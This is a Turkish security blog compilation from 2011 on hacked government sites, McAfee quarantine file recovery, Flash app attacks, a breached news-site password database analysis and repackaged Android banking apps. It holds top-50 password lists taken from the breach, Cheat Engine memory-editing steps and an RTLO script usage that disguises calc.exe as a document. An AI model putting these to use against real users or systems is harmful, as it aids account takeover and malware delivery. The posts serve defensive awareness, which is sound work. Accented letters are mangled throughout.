Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 16: Hack 4 Career - 2011

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

